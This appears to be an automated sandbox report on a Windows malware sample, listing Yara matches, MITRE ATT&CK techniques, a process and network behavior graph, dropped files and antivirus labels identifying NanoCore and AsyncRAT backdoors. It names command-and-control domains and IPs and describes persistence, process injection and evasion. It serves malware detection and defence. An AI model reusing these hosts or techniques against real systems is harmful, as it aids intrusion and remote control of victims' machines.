            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: cmd.exe /C 4_2_00475384
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: cmd.exe /C 9_2_00475384

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Replication Through Removable Media            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		21
            Input Capture            		2
            System Time Discovery            		1
            Replication Through Removable Media            		11
            Archive Collected Data            		Exfiltration Over Other Network Medium4
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts12
            Command and Scripting Interpreter            		2
            Scheduled Task/Job            		1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            Peripheral Device Discovery            		Remote Desktop Protocol1
            Screen Capture            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts2
            Scheduled Task/Job            		Logon Script (Windows)1
            Access Token Manipulation            		131
            Obfuscated Files or Information            		Security Account Manager1
            Account Discovery            		SMB/Windows Admin Shares21
            Input Capture            		Automated Exfiltration1
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)112
            Process Injection            		14
            Software Packing            		NTDS4
            File and Directory Discovery            		Distributed Component Object Model1
            Clipboard Data            		Scheduled Transfer1
            Remote Access Software            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon Script2
            Scheduled Task/Job            		1
            DLL Side-Loading            		LSA Secrets37
            System Information Discovery            		SSHKeyloggingData Transfer Size Limits3
            Non-Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common12
            Masquerading            		Cached Domain Credentials331
            Security Software Discovery            		VNCGUI Input CaptureExfiltration Over C2 Channel14
            Application Layer Protocol            		Jamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items21
            Virtualization/Sandbox Evasion            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc Filesystem21
            Virtualization/Sandbox Evasion            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)112
            Process Injection            		/etc/passwd and /etc/shadow11
            Application Window Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
            Hidden Files and Directories            		Network Sniffing1
            System Owner/User Discovery            		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
            Remote System Discovery            		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 560001 Sample: y8kdmHi6x3.exe Startdate: 26/01/2022 Architecture: WINDOWS Score: 100 90 saw4.playit.gg 2->90 92 chivalrous-condition.auto.playit.gg 2->92 94 agonizing-bat.auto.playit.gg 2->94 114 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->114 116 Malicious sample detected (through community Yara rule) 2->116 118 Antivirus detection for dropped file 2->118 120 14 other signatures 2->120 12 y8kdmHi6x3.exe 3 2->12         started        16 Synaptics.exe 2->16         started        18 ._cache_WINDOWS.EXE 2->18         started        20 dhcpmon.exe 2->20         started        signatures3 process4 file5 78 C:\Users\user\AppData\...\y8kdmHi6x3.exe.log, ASCII 12->78 dropped 128 Antivirus detection for dropped file 12->128 130 Machine Learning detection for dropped file 12->130 22 y8kdmHi6x3.exe 1 5 12->22         started        25 Synaptics.exe 16->25         started        signatures6 process7 file8 70 C:\Users\user\...\._cache_y8kdmHi6x3.exe, PE32 22->70 dropped 72 C:\ProgramData\Synaptics\Synaptics.exe, PE32 22->72 dropped 74 C:\...\Synaptics.exe:Zone.Identifier, ASCII 22->74 dropped 27 ._cache_y8kdmHi6x3.exe 3 22->27         started        32 Synaptics.exe 3 22->32         started        76 C:\ProgramData\...\._cache_Synaptics.exe, PE32 25->76 dropped process9 dnsIp10 108 192.168.2.1 unknown unknown 27->108 80 C:\Users\user\Desktop\WINDOWS.EXE, PE32 27->80 dropped 82 C:\Users\user\Desktop\SYSTEM32.EXE, PE32 27->82 dropped 132 Antivirus detection for dropped file 27->132 134 Machine Learning detection for dropped file 27->134 34 WINDOWS.EXE 2 27->34         started        38 SYSTEM32.EXE 2 27->38         started        136 Multi AV Scanner detection for dropped file 32->136 138 Drops PE files to the document folder of the user 32->138 140 Injects a PE file into a foreign processes 32->140 41 Synaptics.exe 32->41         started        file11 signatures12 process13 dnsIp14 60 C:\Users\user\Desktop\._cache_WINDOWS.EXE, PE32 34->60 dropped 122 Antivirus detection for dropped file 34->122 124 Machine Learning detection for dropped file 34->124 126 Contains functionality to detect sleep reduction / modifications 34->126 43 ._cache_WINDOWS.EXE 34->43         started        48 Synaptics.exe 34->48         started        96 saw4.playit.gg 54.38.136.57, 48129, 49749, 49751 OVHFR France 38->96 98 127.0.0.1 unknown unknown 38->98 100 agonizing-bat.auto.playit.gg 38->100 102 docs.google.com 142.250.186.46, 443, 49765, 49766 GOOGLEUS United States 41->102 104 freedns.afraid.org 69.42.215.252, 49768, 80 AWKNET-LLCUS United States 41->104 106 xred.mooo.com 41->106 62 C:\Users\user\Documents\BNAGMGSPLO\~$cache1, PE32 41->62 dropped 64 C:\Users\user\Desktop\y8kdmHi6x3.exe, PE32 41->64 dropped 66 C:\Users\user\Desktop\._cache_Synaptics.exe, PE32 41->66 dropped 68 5 other malicious files 41->68 dropped file15 signatures16 process17 dnsIp18 110 saw4.playit.gg 43->110 112 chivalrous-condition.auto.playit.gg 43->112 84 C:\Program Files (x86)\...\dhcpmon.exe, PE32 43->84 dropped 86 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 43->86 dropped 88 C:\Users\user\AppData\Local\...\tmp939D.tmp, XML 43->88 dropped 142 Antivirus detection for dropped file 43->142 144 Multi AV Scanner detection for dropped file 43->144 146 Machine Learning detection for dropped file 43->146 150 2 other signatures 43->150 50 schtasks.exe 43->50         started        52 schtasks.exe 43->52         started        148 Injects a PE file into a foreign processes 48->148 54 Synaptics.exe 48->54         started        file19 signatures20 process21 process22 56 conhost.exe 50->56         started        58 conhost.exe 52->58         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            y8kdmHi6x3.exe58%VirustotalBrowse
            y8kdmHi6x3.exe49%MetadefenderBrowse
            y8kdmHi6x3.exe81%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
            y8kdmHi6x3.exe100%AviraHEUR/AGEN.1109339
            y8kdmHi6x3.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\Synaptics\Synaptics.exe100%AviraHEUR/AGEN.1109339
            C:\Users\user\AppData\Local\Temp\RCX831F.tmp100%AviraTR/Dropper.MSIL.Gen
            C:\Users\user\Desktop\y8kdmHi6x3.exe100%AviraTR/Dropper.MSIL.Gen
            C:\Users\user\Desktop\WINDOWS.EXE100%AviraWORM/Dldr.Agent.gqrxn
            C:\Users\user\Desktop\WINDOWS.EXE100%AviraTR/Dropper.MSIL.Gen7
            C:\Users\user\Desktop\WINDOWS.EXE100%AviraW2000M/Dldr.Agent.17651006
            C:\Users\user\Desktop\._cache_Synaptics.exe100%AviraWORM/Dldr.Agent.gqrxn
            C:\Users\user\Desktop\._cache_Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
            C:\Users\user\Desktop\._cache_Synaptics.exe100%AviraTR/Dropper.Gen
            C:\Users\user\Desktop\SYSTEM32.EXE100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\RCX788E.tmp100%AviraTR/Dropper.MSIL.Gen
            C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe100%AviraHEUR/AGEN.1109339
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%AviraTR/Dropper.MSIL.Gen7
            C:\ProgramData\Synaptics\._cache_Synaptics.exe100%AviraWORM/Dldr.Agent.gqrxn
            C:\ProgramData\Synaptics\._cache_Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
            C:\ProgramData\Synaptics\._cache_Synaptics.exe100%AviraTR/Dropper.Gen
            C:\Users\user\Documents\BNAGMGSPLO\~$cache1100%AviraHEUR/AGEN.1109339
            C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe100%AviraWORM/Dldr.Agent.gqrxn
            C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe100%AviraW2000M/Dldr.Agent.17651006
            C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe100%AviraTR/Dropper.Gen
            C:\Users\user\Desktop\._cache_WINDOWS.EXE100%AviraTR/Dropper.MSIL.Gen7
            C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\RCX831F.tmp100%Joe Sandbox ML
            C:\Users\user\Desktop\y8kdmHi6x3.exe100%Joe Sandbox ML
            C:\Users\user\Desktop\WINDOWS.EXE100%Joe Sandbox ML
            C:\Users\user\Desktop\._cache_Synaptics.exe100%Joe Sandbox ML
            C:\Users\user\Desktop\SYSTEM32.EXE100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\RCX788E.tmp100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe100%Joe Sandbox ML
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
            C:\ProgramData\Synaptics\._cache_Synaptics.exe100%Joe Sandbox ML
            C:\Users\user\Documents\BNAGMGSPLO\~$cache1100%Joe Sandbox ML
            C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe100%Joe Sandbox ML
            C:\Users\user\Desktop\._cache_WINDOWS.EXE100%Joe Sandbox ML
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe88%MetadefenderBrowse
            C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe98%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
            C:\ProgramData\Synaptics\._cache_Synaptics.exe93%ReversingLabsWin32.Backdoor.AsyncRAT
            C:\ProgramData\Synaptics\Synaptics.exe49%MetadefenderBrowse
            C:\ProgramData\Synaptics\Synaptics.exe81%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
            C:\Users\user\AppData\Local\Temp\RCX831F.tmp47%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\RCX831F.tmp71%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
            C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe49%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe81%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
            C:\Users\user\Desktop\._cache_Synaptics.exe93%ReversingLabsWin32.Backdoor.AsyncRAT
            C:\Users\user\Desktop\._cache_WINDOWS.EXE88%MetadefenderBrowse
            C:\Users\user\Desktop\._cache_WINDOWS.EXE98%ReversingLabsByteCode-MSIL.Backdoor.NanoCore

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            21.0.Synaptics.exe.400000.21.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            21.0.Synaptics.exe.400000.21.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            21.0.Synaptics.exe.400000.21.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            21.0.Synaptics.exe.400000.21.unpack100%AviraTR/Dropper.GenDownload File
            21.0.Synaptics.exe.400000.21.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            7.0.SYSTEM32.EXE.da0000.0.unpack100%AviraTR/Dropper.GenDownload File
